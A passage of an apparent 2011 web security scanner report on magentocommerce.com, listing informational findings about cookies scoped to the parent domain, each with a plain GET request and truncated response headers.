HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175938; expires=Sat, 11-Aug-2012 15:05:38 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fmedia%2Finterviews%2Ftimeout-online%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:39 GMT
Content-Length: 37701

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.74. http://www.magentocommerce.com/media/interviews/tvonics/view

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/tvonics/view

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/tvonics/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175896; expires=Sat, 11-Aug-2012 15:04:56 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A31%3A%22%2Fmedia%2Finterviews%2Ftvonics%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:56 GMT
Content-Length: 41632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.75. http://www.magentocommerce.com/media/interviews/wander/view

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/wander/view

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/wander/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175967; expires=Sat, 11-Aug-2012 15:06:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fmedia%2Finterviews%2Fwander%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:07 GMT
Content-Length: 40360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.76. http://www.magentocommerce.com/media/interviews/wearport/view

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/wearport/view

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/wearport/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175899; expires=Sat, 11-Aug-2012 15:04:59 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fmedia%2Finterviews%2Fwearport%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:59 GMT
Content-Length: 38889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.77. http://www.magentocommerce.com/media/interviews/wkf-communications/view

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/wkf-communications/view

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/wkf-communications/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175909; expires=Sat, 11-Aug-2012 15:05:09 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A42%3A%22%2Fmedia%2Finterviews%2Fwkf-communications%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:09 GMT
Content-Length: 39057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.78. http://www.magentocommerce.com/media/screencasts

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/media/interviews
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170908; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3Bi%3A1%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.4.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:29 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171069; expires=Sat, 11-Aug-2012 13:44:29 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:29 GMT
Content-Length: 115374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.79. http://www.magentocommerce.com/media/screencasts/adding-related-products/view

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/adding-related-products/view

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/adding-related-products/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176075; expires=Sat, 11-Aug-2012 15:07:55 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A48%3A%22%2Fmedia%2Fscreencasts%2Fadding-related-products%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:55 GMT
Content-Length: 33267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.80. http://www.magentocommerce.com/media/screencasts/community-groups/view

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/community-groups/view

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/community-groups/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176027; expires=Sat, 11-Aug-2012 15:07:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A41%3A%22%2Fmedia%2Fscreencasts%2Fcommunity-groups%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:07 GMT
Content-Length: 33275

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.81. http://www.magentocommerce.com/media/screencasts/configuring-tier-pricing/view

Summary

Severity:   Information
Confidence:   Certain